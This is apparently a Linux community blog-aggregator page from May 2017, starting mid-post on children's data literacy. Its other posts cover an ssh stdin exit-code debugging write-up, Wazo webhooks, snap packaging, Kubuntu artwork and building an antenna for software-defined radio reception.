First, children reflected on the way that programmatic access to data — even data that was technically public — introduced privacy concerns. One user described the ability to analyze data as, “creepy”, but at the same time, “very cool.” Children expressed concern that programmatic access to data could lead to “stalking“ and suggested that the system should ask for permission.

Second, children recognized that data analysis requires skepticism and interpretation. For example, Scratch Community Blocks introduced a bug where the block that returned data about followers included users with disabled accounts. One user, in an interview described to us how he managed to figure out the inconsistency:

At one point the follower blocks, it said I have slightly more followers than I do. And, that was kind of confusing when I was trying to make the project. […] I pulled up a second [browser] tab and compared the [data from Scratch Community Blocks and the data in my profile].

Third, children discussed the hidden assumptions and decisions that drive the construction of metrics. For example, the number of views received for each project in Scratch is counted using an algorithm that tries to minimize the impact of gaming the system (similar to, for example, Youtube). As children started to build programs with data, they started to uncover and speculate about the decisions behind metrics. For example, they guessed that the view count might only include “unique” views and that view counts may include users who do not have accounts on the website.

Fourth, children building projects with Scratch Community Blocks realized that an algorithm driven by social data may cause certain users to be excluded. For example, a 13-year-old expressed concern that the system could be used to exclude users with few social connections saying:

I love these new Scratch Blocks! However I did notice that they could be used to exclude new Scratchers or Scratchers with not a lot of followers by using a code: like this:
when flag clicked
if then user’s followers < 300
stop all.
I do not think this a big problem as it would be easy to remove this code but I did just want to bring this to your attention in case this not what you would want the blocks to be used for.

Fifth, children were concerned about the possibility that measurement might distort the Scratch community’s values. While giving feedback on the new system, a user expressed concern that by making it easier to measure and compare followers, the system could elevate popularity over creativity, collaboration, and respect as a marker of success in Scratch.

I think this was a great idea! I am just a bit worried that people will make these projects and take it the wrong way, saying that followers are the most important thing in on Scratch.

Kids’ conversations around Scratch Community Blocks are good news for educators who are starting to think about how to engage young learners in thinking critically about the implications of data. Although no kid using Scratch Community Blocks discussed each of the five literacies described above, the themes reflect starting points for educators designing ways to engage kids in thinking critically about data.

Our work shows that if children are given opportunities to actively engage and build with social and behavioral data, they might not only learn how to do data analysis, but also reflect on its implications.

This blog-post and the work that it describes is a collaborative project by Samantha Hautea, Sayamindu Dasgupta, and Benjamin Mako Hill. We have also received support and feedback from members of the Scratch team at MIT (especially Mitch Resnick and Natalie Rusk), as well as from Hal Abelson from MIT CSAIL. Financial support came from the US National Science Foundation.

19 May, 2017 12:51AM

May 18, 2017

Ken VanDine: Ubuntu Desktop - Call for feedback

With the Ubuntu Desktop transitioning from Unity to GNOME, what does that look like in 17.10 and 18.04?  You can learn some more about that by checking out my interview on OMG! Ubuntu!, but more importantly our friends at OMG! Ubuntu! are helping us out by collecting some user feedback on GNOME extensions and defaults.  Please take a few minutes and complete the survey.  Thanks for your input!

18 May, 2017 04:51PM by Ken VanDine (

Ubuntu Podcast from the UK LoCo: S10E11 – Flaky Noxious Rainstorm - Ubuntu Podcast

We talk about getting older and refusbishing ZX Spectrums. Ubuntu, Fedora and openSUSE are “apps” in the Windows Store. Android has a new modular base, Fuscia has a new UI layer, HP laptops come pre-installed with a keylogger, many people WannaCry and Ubuntu start to reveal their plans for Ubuntu 17.10 desktop.

It’s Season Ten Episode Eleven of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpressare connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

18 May, 2017 02:00PM

Alessio Treglia: Digital Ipseity: Which Identity?


Within the next three years, more than seven billion people and businesses will be connected to the Internet. During this time of dramatic increases in access to the Internet, networks have seen an interesting proliferation of systems for digital identity management (i.e. our SPID in Italy). But what is really meant by “digital identity“? All these systems are implemented in order to have the utmost certainty that the data entered by the subscriber (address, name, birth, telephone, email, etc.) is directly coincident with that of the physical person. In other words, data are certified to be “identical” to those of the user; there is a perfect overlap between the digital page and the authentic user certificate: an “idem“, that is, an identity.

This identity is our personal records reflected on the net, nothing more than that. Obviously, this data needs to be appropriately protected from malicious attacks by means of strict privacy rules, as it contains so-called “sensitive” information, but this data itself is not sufficiently interesting for the commercial market, except for statistical purposes on homogeneous population groups. What may be a real goldmine for the “web company” is another type of information: user’s ipseity. It is important to immediately remove the strong semantic ambiguity that weighs on the notion of identity. There are two distinct meanings…

<Read More…[by Fabio Marzocca]>

18 May, 2017 08:50AM

hackergotchi for Grml developers

Grml developers

Michael Prokop: Debugging a mystery: ssh causing strange exit codes?

XKCD comic 1722

Recently we had a WTF moment at a customer of mine which is worth sharing.

In an automated deployment procedure we’re installing Debian systems and setting up MySQL HA/Scalability. Installation of the first node works fine, but during installation of the second node something weird is going on. Even though the deployment procedure reported that everything went fine: it wasn’t fine at all. After bisecting to the relevant command lines where it’s going wrong we identified that the failure is happening between two ssh/scp commands, which are invoked inside a chroot through a shell wrapper. The ssh command caused a wrong exit code showing up: instead of bailing out with an error (we’re running under ‘set -e‘) it returned with exit code 0 and the deployment procedure continued, even though there was a fatal error. Initially we triggered the bug when two ssh/scp command lines close to each other were executed, but I managed to find a minimal example for demonstration purposes:

# cat ssh_wrapper 
chroot << "EOF" / /bin/bash
ssh root@localhost hostname >/dev/null
exit 1
echo "return code = $?"

What we’d expect is the following behavior, receive exit code 1 from the last command line in the chroot wrapper:

# ./ssh_wrapper 
return code = 1

But what we actually get is exit code 0:

# ./ssh_wrapper 
return code = 0

Uhm?! So what’s going wrong and what’s the fix? Let’s find out what’s causing the problem:

# cat ssh_wrapper 
chroot << "EOF" / /bin/bash
ssh root@localhost command_does_not_exist >/dev/null 2>&1
exit "$?"
echo "return code = $?"

# ./ssh_wrapper 
return code = 127

Ok, so if we invoke it with a binary that does not exist we properly get exit code 127, as expected.
What about switching /bin/bash to /bin/sh (which corresponds to dash here) to make sure it’s not a bash bug:

# cat ssh_wrapper 
chroot << "EOF" / /bin/sh
ssh root@localhost hostname >/dev/null
exit 1
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

Oh, but that works as expected!?

When looking at this behavior I had the feeling that something is going wrong with file descriptors. So what about wrapping the ssh command line within different tools? No luck with `stdbuf -i0 -o0 -e0 ssh root@localhost hostname`, nor with `script -c “ssh root@localhost hostname” /dev/null` and also not with `socat EXEC:”ssh root@localhost hostname” STDIO`. But it works under unbuffer(1) from the expect package:

# cat ssh_wrapper 
chroot << "EOF" / /bin/bash
unbuffer ssh root@localhost hostname >/dev/null
exit 1
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

So my bet on something with the file descriptor handling was right. Going through the ssh manpage, what about using ssh’s `-n` option to prevent reading from standard input (stdin)?

# cat ssh_wrapper
chroot << "EOF" / /bin/bash
ssh -n root@localhost hostname >/dev/null
exit 1
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

Bingo! Quoting ssh(1):

     -n      Redirects stdin from /dev/null (actually, prevents reading from stdin).
             This must be used when ssh is run in the background.  A common trick is
             to use this to run X11 programs on a remote machine.  For example,
             ssh -n emacs & will start an emacs on,
             and the X11 connection will be automatically forwarded over an encrypted
             channel.  The ssh program will be put in the background.  (This does not work
             if ssh needs to ask for a password or passphrase; see also the -f option.)

Let’s execute the scripts through `strace -ff -s500 ./ssh_wrapper` to see what’s going in more detail.
In the strace run without ssh’s `-n` option we see that it’s cloning stdin (file descriptor 0), getting assigned to file descriptor 4:

dup(0)            = 4
read(4, "exit 1\n", 16384) = 7

while in the strace run with ssh’s `-n` option being present there’s no file descriptor duplication but only:

open("/dev/null", O_RDONLY) = 4

This matches ssh.c’s ssh_session2_open function (where stdin_null_flag corresponds to ssh’s `-n` option):

        if (stdin_null_flag) {                                            
                in = open(_PATH_DEVNULL, O_RDONLY);
        } else {
                in = dup(STDIN_FILENO);

This behavior can also be simulated if we explicitly read from /dev/null, and this indeed works as well:

# cat ssh_wrapper
chroot << "EOF" / /bin/bash
ssh root@localhost hostname >/dev/null </dev/null
exit 1
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

The underlying problem is that both bash and ssh are consuming from stdin. This can be verified via:

# cat ssh_wrapper
chroot << "EOF" / /bin/bash
echo "Inner: pre"
while read line; do echo "Eat: $line" ; done
echo "Inner: post"
exit 3
echo "Outer: exit code = $?"

# ./ssh_wrapper
Inner: pre
Eat: echo "Inner: post"
Eat: exit 3
Outer: exit code = 0

This behavior applies to bash, ksh, mksh, posh and zsh. Only dash doesn’t show this behavior.
To understand the difference between bash and dash executions we can use the following test scripts:

# cat stdin-test-cmp

TEST_SH=bash strace -v -s500 -ff ./stdin-test 2>&1 | tee stdin-test-bash.out
TEST_SH=dash strace -v -s500 -ff ./stdin-test 2>&1 | tee stdin-test-dash.out

# cat stdin-test

: ${TEST_SH:=dash}

echo "Inner: pre"
while read line; do echo "Eat: $line"; done
echo "Inner: post"
exit 3

echo "Outer: exit code = $?"

When executing `./stdin-test-cmp` and comparing the generated files stdin-test-bash.out and stdin-test-dash.out you’ll notice that dash consumes all stdin in one single go (a single `read(0, …)`), instead of character-by-character as specified by POSIX and implemented by bash, ksh, mksh, posh and zsh. See stdin-test-bash.out on the left side and stdin-test-dash.out on the right side in this screenshot:

screenshot of vimdiff on *.out files

So when ssh tries to read from stdin there’s nothing there anymore.

Quoting POSIX’s sh section:

When the shell is using standard input and it invokes a command that also uses standard input, the shell shall ensure that the standard input file pointer points directly after the command it has read when the command begins execution. It shall not read ahead in such a manner that any characters intended to be read by the invoked command are consumed by the shell (whether interpreted by the shell or not) or that characters that are not read by the invoked command are not seen by the shell. When the command expecting to read standard input is started asynchronously by an interactive shell, it is unspecified whether characters are read by the command or interpreted by the shell.

If the standard input to sh is a FIFO or terminal device and is set to non-blocking reads, then sh shall enable blocking reads on standard input. This shall remain in effect when the command completes.

So while we learned that both bash and ssh are consuming from stdin and this needs to prevented by either using ssh’s `-n` or explicitly specifying stdin, we also noticed that dash’s behavior is different from all the other main shells and could be considered a bug (which we reported as #862907).

Lessons learned:

  • Be aware of ssh’s `-n` option when using ssh/scp inside scripts.
  • Feeding shell scripts via stdin is not only error-prone but also very inefficient, as for a standards compliant implementation it requires a read(2) system call per byte of input. Instead create a temporary script you safely execute then.
  • When debugging problems make sure to explore different approaches and tools to ensure you’re not relying on a buggy behavior in any involved tool.

Thanks to Guillem Jover for review and feedback regarding this blog post.

18 May, 2017 07:29AM

hackergotchi for Wazo


Webhook coming in Wazo

Depuis plusieurs mois nous travaillons activement pour améliorer Wazo et le rendre le plus ouvert possible. La dernière version 17.07 mets en lumière nos derniers travaux et nos développements actuels autour de Wazo. Vous découvrirez ainsi : une nouvelle interface web basée sur nos APIs REST, une place de marché pour permettre d'étendre Wazo facilement, des nouvelles fonctionnalités comme les menus vocaux, les lignes multiples pour un utilisateur, etc.

Mais nous avons encore quelques surprises pour vous au cours des prochains mois ! Avec en tête l'objectif de créer une plateforme de téléphonie à votre image, vous permettant de construire votre système sur mesure, il nous est apparu nécessaire de développer un outil rendant possible l'interconnexion avec une plateforme proposant plus de 700 autres produits intéressants sur le marché.

J'ai donc commencé un travail d'un connecteur sur une plateforme appelée Zapier. Pour ceux qui ne connaissent pas rendez-vous directement sur leur site web et créez vous un compte pour tester, c'est gratuit.



Zapier est une plateforme cloud, avec des centaines de connecteurs vous permettant de faire 3 choses.

  • Un "trigger"
  • Une action
  • Un "search" (qui est une action aussi)

Le "trigger" est une action à un temps donné. Exemple avec le cas de Wazo, récupère moi mes derniers journaux d'appel. Une petite particularité dans Zapier, c'est qu'un trigger est exécuté par défaut toutes les 5 ou 15 minutes selon votre type de compte. Bien sur il existe aussi un autre type de "trigger" appel "instant trigger" qui lui permet de recevoir un évènement. Le mécanisme de Zapier est appelé REST hooks et ils ont fait un site web pour en expliquer leur vision. (

Un fois que vous avez choisi votre "trigger", zapier vous offre la possibilité avec le résultat d'en faire une action. Les applications Zapier doivent donc offrir un mécanisme de "IN" et de "OUT". Prenons toujours notre exemple avec Wazo, mon "IN" sera donc un trigger de mes journaux d'appels et mon "OUT" sera par exemple une action pour envoyer mes données vers une feuille de calcul Google Sheets.

Le fonctionnement sera alors le suivant, toutes les X minutes, Zapier fera une requête sur mon Wazo, si j'ai eu de nouvelles entrées alors Zapier les enverra sur ma feuille Google. Simple non ?

Donc comment cela se configure ? Premièrement vous devez avoir une compte sur la plateforme Zapier, vous allez simplement cliquer sur "MAKE A ZAP" puis vous aller choisir votre application "IN", c'est à dire votre "trigger".


Une fois votre choix fait, vous allez simplement choisir les "triggers" disponible.


Puis vous allez créer un compte de connexion entre Zapier et votre Wazo. Attention, un prérequis important votre Wazo doit être accessible par Zapier sur le port 443 pour accéder aux APIs de Wazo.


Une fois votre connexion établi vous n'aurez plus qu'à choisir votre application "OUT", c'est à dire l'action souhaitée. À partir du moment où votre "ZAP" est créé vous n'avez plus rien à faire, Zapier et Wazo travaillerons ensemble et automatiserons votre export. Bien sûr ceci est simplement un exemple, je vous laisse parcourir les centaines d'applications et trouver ce qui vous intéresse le plus.

Il est aussi intéressant d'avoir d'autre ouverture possible. Cela m'a amené à développer un nouveau service dans Wazo permettant cette ouverture vers de nombreuses applications. Mon prochain exemple sera basé sur un logiciel libre qui monte et se présentant comme une véritable alternative à SLACK qui est une plateforme de communication temps réel (un irc plus évolué), appelé Mattermost. Il en existe probablement d'autres, mais nous utilisons Mattermost en interne depuis un long moment et donc nous connaissons mieux ce logiciel.


Si vous souhaitez avoir plus d'informations sur Mattermost, je vous invite à consulter leur site web directement. Nous utilisons de notre côté la version communautaire et nous sommes globalement toujours à jour.


Mattermost offre la possibilité comme dans SLACK de faire des webhook de type "IN" ou "OUT", ça ressemble à Zapier un peu ;). Le webhook de type "IN" est simplement une interface HTTP où l'on va envoyer un message en format JSON. C'est assez basique, mais très simple à mettre en oeuvre.

Pour ce faire, il suffit d'aller dans la console de Mattermost, de choisir "intégrations" et de créer un webhook de type incoming. Vous choisirez alors le canal où vous souhaitez recevoir le message.


Un exemple assez simple du message à poster dans votre requête:

  "username": "quintana",
  "text": "Salut c'est sylvain"

Facile :)

Revenons à Wazo ! Comme toujours, quand on développe dans Wazo, il est obligatoire d'offrir une interface REST pour cette fonctionnalité, ce qui permet aussi d'ajouter simplement un plugin dans notre nouvelle interface de gestion.


Dans le cas de Wazo, voici à quoi cela va ressembler.


Comment cela fonctionne ? Nous avons pris l'habitude depuis plusieurs années d'envoyer un évènement dans notre bus (basé sur RabbitMQ) à chaque évènement. Ce qui veut dire par exemple que lorsqu'on reçoit un appel sur son téléphone, nous avons un évènement qui est envoyé dans le bus avec comme nom "call_created".

Voici une idée d'exemple concret avec Mattermost et Wazo. Je souhaite recevoir sur un channel, l'information que mon téléphone sonne. Pour le mettre en oeuvre, il suffira alors.

  • Créer un webhook de type incoming sur Mattermost vers un canal défini.
  • Récupérer l'adresse de ce webhook.
  • Créer un webhook sur Wazo sur l'évènement "call_created" qui enverra sur l'adresse HTTP de Mattermost le JSON décrit ci-dessus.

Ouf on y arrive.

Créer le wekhook sur Wazo, il faut le plugin wehbook de Wazo, puis appuyer sur le petit plus pour en ajouter un nouveau.


Vous allez entrer un nom, par exemple "Mattermost call created" puis:

  • Event Name: "call_created"
  • Target: "http://mattermost/hook/monhook
  • Method: "post" (les hooks de mattermost sont des POST)
  • Content Type: Nous laisserons du JSON
  • Users: Vous allez choisir de quel utilisateur vous souhaitez faire un webhook.
  • Template: Notre fameux JSON du dessus.


Les templates sont basés sur des templates jinja et vous pouvez donc récupérer les informations du message dans votre template en utilisant la syntaxe {{ payload }}. Example {{ payload.user_uuid }}.

Une fois votre webhook terminé, il suffira de recevoir et d'émettre un appel et vous recevrez en temps réel sur votre canal Mattermost l'information donnée.

Exemple avancé:


J'espère que cette information vous sera utile et vous permettra de mieux comprendre ce que vous allez pouvoir faire avec Wazo très bientôt !

N'hésitez pas à communiquer avec nous et nous remonter vos remarques.


18 May, 2017 04:00AM by Sylvain Boily

May 17, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Simplenote gives a new life to your notes

There’s a new desktop snap in the Snap store: Simplenote.

Write in Markdown, sync, tag, collaborate and publish

If you haven’t tried it yet, Simplenote brings a solid note taking utility to your day-to-day open source toolkit. Don’t be fooled by a simple appearance, as it’s one of the most comprehensive editing suite around, especially for Markdown, with previews and extensive syntax support.

While its most prominent feature is instant notes syncing across devices (and platforms — Linux, web, Android, Mac, Windows and iOS), Simplenote also comes with a tagging system and collaborative editing. For example, tag a note with someone’s email address to edit it together. If you want to make a note temporarily public, it even gives you the ability to publish notes as standalone webpages in two clicks.

To install Simplenote as a snap:

sudo snap install simplenote

Simple to install, automatically updated

Why does it make sense to have Simplenote packaged as a snap? Snaps mean simple installation and update management with no need to worry about dependencies. It also means that when the software vendors make them available, it’s easier to access the beta version of their app or even daily builds.

How many Linux packages format Electron developers need?

While the right answer is probably “as many as they need to reach their full potential audience”, snapping Electron applications means building one snap that works on all the major Linux distributions, with support for more distributions growing.

User install documentation can be simplified and your application will be discoverable by millions of Linux users in the Software Center. To ease the building process even more, the snap format is integrated with Electron Builder.

Give all users your greatest release at the same time

Application developers are in complete control of the publishing and release of their software, it drastically simplifies support as they can control the version of the app being consumed. Once a snap is installed, it will automatically be kept up to date, with install metrics available from the snap store. No more having to maintain old versions or asking users to update first before reporting bugs.

Get started with snaps at or watch the developer intro video first:

17 May, 2017 08:16PM by Ubuntu Insights (

hackergotchi for Maemo developers

Maemo developers

The rules of scuba diving

  • First rule. You must understand the rules of scuba diving. If you don’t know or understand the rules of scuba diving, go to the second rule.
  • The second rule is that you never dive alone.
  • The third rule is that you always keep close enough to each other to perform a rescue of any kind.
  • The forth rule is that you signal each other and therefor know each other’s signals. Underwater, communication is key.
  • The fifth rule is that you tell the others, for example, when you don’t feel well. The others want to know when you emotionally don’t feel well. Whenever you are insecure, you tell them. This is hard.
  • The sixth rule is that you don’t violate earlier agreed upon rules.
  • The seventh rule is that given rules will be eclipsed the moment any form of panic occurs, you will restore the rules using rationalism first, pragmatism next but emotional feelings last. No matter what.
  • The eighth rule is that the seventh rule is key to survival.

These rules make scuba diving an excellent learning school for software development project managers.

0 Add to favourites0 Bury

17 May, 2017 07:41PM by Philip Van Hoof (

hackergotchi for Ubuntu developers

Ubuntu developers

Daniel Pocock: Hacking the food chain in Switzerland

A group has recently been formed on Meetup seeking to build a food computer in Zurich. The initial meeting is planned for 6:30pm on 20 June 2017 at ETH, (Zurich Centre/Zentrum, Rämistrasse 101).

The question of food security underlies many of the world's problems today. In wealthier nations, we are being called upon to trust a highly opaque supply chain and our choices are limited to those things that major supermarket chains are willing to stock. A huge transport and storage apparatus adds to the cost and CO2 emissions and detracts from the nutritional value of the produce that reaches our plates. In recent times, these problems have been highlighted by the horsemeat scandal, the Guacapocalypse and the British Hummus crisis.

One interesting initiative to create transparency and encourage diversity in our diets is the Open Agriculture (OpenAg) Initiative from MIT, summarised in this TED video from Caleb Harper. The food produced is healthier and fresher than anything you might find in a supermarket and has no exposure to pesticides.

An open source approach to food

An interesting aspect of this project is the promise of an open source approach. The project provides hardware plans, a a video of the build process, source code and the promise of sharing climate recipes (scripts) to replicate the climates of different regions, helping ensure it is always the season for your favour fruit or vegetable.

Do we need it?

Some people have commented on the cost of equipment and electricity. Carsten Agger recently blogged about permaculture as a cleaner alternative. While there are many places where people can take that approach, there are also many overpopulated regions and cities where it is not feasible. Some countries, like Japan, have an enormous population and previously productive farmland contaminated by industry, such as the Fukushima region. Growing our own food also has the potential to reduce food waste, as individual families and communities can grow what they need.

Whether it is essential or not, the food computer project also provides a powerful platform to educate people about food and climate issues and an exciting opportunity to take the free and open source philosophy into many more places in our local communities. The Zurich Meetup group has already received expressions of interest from a diverse group including professionals, researchers, students, hackers, sustainability activists and free software developers.

Next steps

People who want to form a group in their own region can look in the forum topic "Where are you building your Food Computer?" to find out if anybody has already expressed interest.

Which patterns from the free software world can help more people build more food computers? I've already suggested using Debian's live-wrapper to distribute a runnable ISO image that can boot from a USB stick, can you suggest other solutions like this?

Can you think of any free software events where you would like to see a talk or exhibit about this project? Please suggest them on the OpenAg forum.

There are many interesting resources about the food crisis, an interesting starting point is watching the documentary Food, Inc.

If you are in Switzerland, please consider attending the meeting on at 6:30pm on 20 June 2017 at ETH (Centre/Zentrum), Zurich.

One final thing to contemplate: if you are not hacking your own food supply, who is?

17 May, 2017 06:41PM

Timo Aaltonen: Mesa 17.1.0 for Ubuntu 16.04 & 17.04

The X-Updates PPA has the latest Mesa release for xenial and zesty, go grab it while it’s hot!

On a related note, Mesa 17.0.6 got accepted to zesty-proposed, so give that a spin too if you’re running zesty and report “yay!”/”eww..” on the SRU bug.

17 May, 2017 04:20PM

Alan Pope: Building Apps for Linux without Linux

It's now super easy to build Linux software packages on your Windows laptop. No VM required, no need for remote Linux hosts.

I spend a lot of my day talking to developers about their Linux software packaging woes. Many of them are using Linux desktops as their primary development platform. Some aren't, and that's their (or their employers) choice. For those developers who run Windows and want to target Linux for their applications, things just got a bit easier.

Snapcraft now runs on Windows, via Bash on Windows (a.k.a Windows Subsystem for Linux).

Snapcraft on Windows

Microsoft updated their Windows Subsystem for Linux to include Ubuntu 16.04.2 LTS as the default image. When WSL first launched a year ago, it shipped 14.04 to early adopters and developers.

Snapcraft is available in the Ubuntu 16.04 repositories, so is install-able inside WSL. So developers on Windows can easily run Snapcraft to package their software as snaps, and push to the store. No need for virtual machines, or separate remote hosts running Linux.

I made a quick video about it here. Please share it with your Windows-using developer friends :)

If you already have WSL setup with Ubuntu 14.04 the easiest way to move to 16.04.2 is to delete the install and start again. This will remove the installed packages and data in your WSL setup, so backup first. Open a command prompt window in Windows and run:-

lxrun /uninstall

To re-install, which will pull down Ubuntu 16.04.2 LTS:-

lxrun /install

Re-installing Ubuntu

Once you've got Ubuntu 16.04.2 LTS in WSL, launch it from the start menu then install snapcraft from the Ubuntu repositories with:-

sudo apt install snapcraft

Once that's done, you can either launch snapcraft within Bash on Windows, or directly from a Window command prompt shell with bash -c snapcraft. Here's a video showing me building the Linux version of storjshare using this configuration on my Windows 10 desktop from a standard command prompt window. I sped the video up because nobody wants to watch 8 minutes of shell scrolling by in realtime. Also, my desktop is quite slow. :)

You can find out more about snapcraft from our documentation, tutorials, and the videos. We also have a forum where we'd love to hear about your experience with snapcraft.

17 May, 2017 02:00PM

Ubuntu Insights: Ubuntu ranked as 2nd most used IoT OS by Eclipse Foundation survey

Last week we posted a blog on programming languages following the Eclipse Foundation 2017 IoT survey results. This week we look at the findings from a business perspective which highlight a number of IoT trends emerging from the wide ranging survey from key industries, growth of new technologies, most common concerns and more. The 2017 results garnered a total of 713 respondents, from all over the world, providing their views on how they are building and using IoT solutions today.

When it comes to building IoT solutions, Linux continues to be the main operating system for both IoT gateways (66.9%) and on constrained devices (44.1%). Taking both these into account, Ubuntu and Ubuntu Core are being used by 44% of those using Linux and far ahead of many alternative operating systems. Designed especially for IoT applications, and trusted by chipset vendors to device makers and system integrators, it’s encouraging to see such a high adoption rate for Ubuntu Core. Those that weren’t using Linux as their chosen OS for IoT were in fact most likely to be using a bare metal solution instead.

More positives for the open source world found that 46.1% of organisations use this in their IoT solutions, with a further 49.1% having either experimented with it or a committer on such a project for building IoT solutions. This demonstrates the fact open source within the embedded space is not feared and is seen as the best way to deliver projects especially when fast development times are expected.

Looking at broader topics that the survey covered revealed that the top 5 IoT industries saw significant growth from three areas in particular; smart cities, energy management and industrial automation. Although home automation and IoT platforms remained in the top 5 just as they did in 2016, it provides further evidence that IoT is spreading across verticals with an increasing number of sectors looking to integrate and benefit from it.

Inevitably security remains the key concern that IoT developers face, followed by interoperability and connectivity. Interestingly, interoperability was deemed less of a concern than both the 2015 and 2016 surveys indicating that the increase in number and influence of IoT consortiums is starting to have a positive effect. The Eclipse Foundation and IEEE were seen as the top two most important to those organisations who responded. Efforts to create standardisation in the industry such as the introduction of snaps, a universal Linux packaging format, may also be a factor in the lower interoperability concerns highlighted in 2017.

Many of the findings of the 2017 survey correlate with other industry reports showing a consistent theme across the board. Although IoT continues to evolve at a fast rate, this survey confirms that many of the concerns remain the same regardless of industry and all those in the IoT ecosystem should continue to collaborate to help overcomes these challenges.

The full results can be viewed here, or the key findings are summarised here.

17 May, 2017 09:43AM

May 16, 2017

Aaron Honeycutt: Kubuntu Artful Cycle work – Part1

This cycle I’ve decided to look at what art and design I can improve in Kubuntu. The first was having something we’ve never had, a wallpaper contest that’s available to ALL users. We’re encouraging all our artist users to submit art ranging from digital, photographic, and beyond! You all have till June 8 to submit your wonderful and artful work.

I’ve also taken a look at our slideshow in its current state:

After a weekend, a few extra days and some great feedback from both our Kubuntu community and the KDE VDG, I’m really pleased with the improvement. It’s based on the work the Ubuntu Budgie team have done on their slideshow so a HUGGGGEEEE shout out to them for their great work. Here is the current WIP state:

Currently the work is in my own branch, of the ubiquity-slideshow-ubuntu package on Launchpad. Once I’ve mostly finished and we’ve gotten some feedback, I’ll send a merge request to put it in the main package and brought to you for Kubuntu 17.10.

16 May, 2017 10:40PM

Daniel Pocock: Building an antenna and receiving ham and shortwave stations with SDR

In my previous blog on the topic of software defined radio (SDR), I provided a quickstart guide to using gqrx, GNU Radio and the RTL-SDR dongle to receive FM radio and the amateur 2 meter (VHF) band.

Using the same software configuration and the same RTL-SDR dongle, it is possible to add some extra components and receive ham radio and shortwave transmissions from around the world.

Here is the antenna setup from the successful SDR workshop at OSCAL'17 on 13 May:

After the workshop on Saturday, members of the OSCAL team successfully reconstructed the SDR and antenna at the Debian info booth on Sunday and a wide range of shortwave and ham signals were detected:

Here is a close-up look at the laptop, RTL-SDR dongle (above laptop), Ham-It-Up converter (above water bottle) and MFJ-971 ATU (on right):

Buying the parts

Component Purpose, Notes Price/link to source
RTL-SDR dongle Converts radio signals (RF) into digital signals for reception through the USB port. It is essential to buy the dongles for SDR with TCXO, the generic RTL dongles for TV reception are not stable enough for anything other than TV. ~ € 25
Enamelled copper wire, 25 meters or more Loop antenna. Thicker wire provides better reception and is more suitable for transmitting (if you have a license) but it is heavier. The antenna I've demonstrated at recent events uses 1mm thick wire. ~ € 10
4 (or more) ceramic egg insulators Attach the antenna to string or rope. Smaller insulators are better as they are lighter and less expensive. ~ € 10
4:1 balun The actual ratio of the balun depends on the shape of the loop (square, rectangle or triangle) and the point where you attach the balun (middle, corner, etc). You may want to buy more than one balun, for example, a 4:1 balun and also a 1:1 balun to try alternative configurations. Make sure it is waterproof, has hooks for attaching a string or rope and an SO-239 socket. from € 20
5 meter RG-58 coaxial cable with male PL-259 plugs on both ends If using more than 5 meters or if you want to use higher frequencies above 30MHz, use thicker, heavier and more expensive cables like RG-213. The cable must be 50 ohm. ~ € 10
Antenna Tuning Unit (ATU) I've been using the MFJ-971 for portable use and demos because of the weight. There are even lighter and cheaper alternatives if you only need to receive. ~ € 20 for receive only or second hand
PL-259 to SMA male pigtail, up to 50cm, RG58 Joins the ATU to the upconverter. Cable must be RG58 or another 50 ohm cable ~ € 5
Ham It Up v1.3 up-converter Mixes the HF signal with a signal from a local oscillator to create a new signal in the spectrum covered by the RTL-SDR dongle ~ € 40
SMA (male) to SMA (male) pigtail Join the up-converter to the RTL-SDR dongle ~ € 2
USB charger and USB type B cable Used for power to the up-converter. A spare USB mobile phone charge plug may be suitable. ~ € 5
String or rope For mounting the antenna. A ligher and cheaper string is better for portable use while a stronger and weather-resistent rope is better for a fixed installation. € 5

Building the antenna

There are numerous online calculators for measuring the amount of enamelled copper wire to cut.

For example, for a centre frequency of 14.2 MHz on the 20 meter amateur band, the antenna length is 21.336 meters.

Add an extra 24 cm (extra 12 cm on each end) for folding the wire through the hooks on the balun.

After cutting the wire, feed it through the egg insulators before attaching the wire to the balun.

Measure the extra 12 cm at each end of the wire and wrap some tape around there to make it easy to identify in future. Fold it, insert it into the hook on the balun and twist it around itself. Use between four to six twists.

Strip off approximately 0.5cm of the enamel on each end of the wire with a knife, sandpaper or some other tool.

Insert the exposed ends of the wire into the screw terminals and screw it firmly into place. Avoid turning the screw too tightly or it may break or snap the wire.

Insert string through the egg insulators and/or the middle hook on the balun and use the string to attach it to suitable support structures such as a building, posts or trees. Try to keep it at least two meters from any structure. Maximizing the surface area of the loop improves the performance: a circle is an ideal shape, but a square or 4:3 rectangle will work well too.

For optimal performance, if you imagine the loop is on a two-dimensional plane, the first couple of meters of feedline leaving the antenna should be on the plane too and at a right angle to the edge of the antenna.

Join all the other components together using the coaxial cables.

Configuring gqrx for the up-converter and shortwave signals

Inspect the up-converter carefully. Look for the crystal and find the frequency written on the side of it. The frequency written on the specification sheet or web site may be wrong so looking at the crystal itself is the best way to be certain. On my Ham It Up, I found a crystal with 125.000 written on it, this is 125 MHz.

Launch gqrx, go to the File menu and select I/O devices. Change the LNB LO value to match the crystal frequency on the up-converter, with a minus sign. For my Ham It Up, I use the LNB LO value -125.000000 MHz.

Click OK to close the I/O devices window.

On the Input Controls tab, make sure Hardware AGC is enabled.

On the Receiver options tab, change the Mode value. Commercial shortwave broadcasts use AM and amateur transmission use single sideband: by convention, LSB is used for signals below 10MHz and USB is used for signals above 10MHz. To start exploring the 20 meter amateur band around 14.2 MHz, for example, use USB.

In the top of the window, enter the frequency, for example, 14.200 000 MHz.

Now choose the FFT Settings tab and adjust the Freq zoom slider. Zoom until the width of the display is about 100 kHZ, for example, from 14.15 on the left to 14.25 on the right.

Click the Play icon at the top left to start receiving. You may hear white noise. If you hear nothing, check the computer's volume controls, move the Gain slider (bottom right) to the maximum position and then lower the Squelch value on the Receiver options tab until you hear the white noise or a transmission.

Adjust the Antenna Tuner knobs

Now that gqrx is running, it is time to adjust the knobs on the antenna tuner (ATU). Reception improves dramatically when it is tuned correctly. Exact instructions depend on the type of ATU you have purchased, here I present instructions for the MFJ-971 that I have been using.

